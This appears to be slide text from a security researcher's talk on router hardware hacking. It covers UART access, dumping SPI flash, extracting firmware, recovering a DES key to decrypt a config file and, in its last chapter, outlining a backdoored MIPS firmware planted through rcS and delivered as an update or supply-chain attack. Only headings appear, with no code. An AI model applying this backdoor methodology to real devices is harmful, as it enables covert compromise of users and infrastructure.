Professional Documents
Culture Documents
Beyond The Logic
Beyond The Logic
https://almaszaman.com
Almas Zaman
Information Security Researcher
and Adjunct Assistant Professor
Objectives
• An Embedded Device
• An RTOS
• An IoT or IoT Gateway
• A part of a SCADA System
Auditing the PCB
• ESMT M14D5121632A
• DDR3 SDRAM (64 MB)
• Winbond
25Q64CSIG
• Flash Memory (8
MB)
• MediaTek MT7628NN
• 580 MHz CPU (system-
on-chip - SoC)
• Possible UART
Interface
Front Back
Finding the UART Oscilloscopes/logic Analyzer/Multimeter
A surface-mount
resistor (R18) in
RX
It’s a 1kΩ SMD: Let’s Desolder It and Try Again!
Busybox
Utilities List
Root User
Chapter 2
Interfacing and Reading the SPI with Programmer
• Winbond 25Q64CSIG
• Flash Memory (8 MB)
CH341A/CH347 Programmer
but… We chose the Hardest one
Pin Connections
Raspberry Pi Zero w Pinout
Wiring With Winbond 25Q64 And Raspberry Pi GPIO
Final Setup
Spark Again!!! Dumping Firmware from Winbond
25Q64 (dump.bin)
Extract the firmware (dump.bin) with Firmware Mod Kit
Filesystem
Web UI of the Router
Encrypted XML File
Disassembling libcmm.so with a SRE tool
Found DES Algorithm
Copying the
Encryption Key 8
bytes
Decrypt with OpenSSL
Chapter 3
Creating Backdoor for MIPS Architecture (L-Backdoor)
From Open source
Make a loader (loader.sh) to execute after 30 second
Adding A Task During The Boot Process In (rcS)
Building the Malicious Firmware
Now, It’s Ready For Writing Via SPI, Or You Can
Upload It As A Device Update
SCADA or Malicious Hardware as a Supply Chain Attack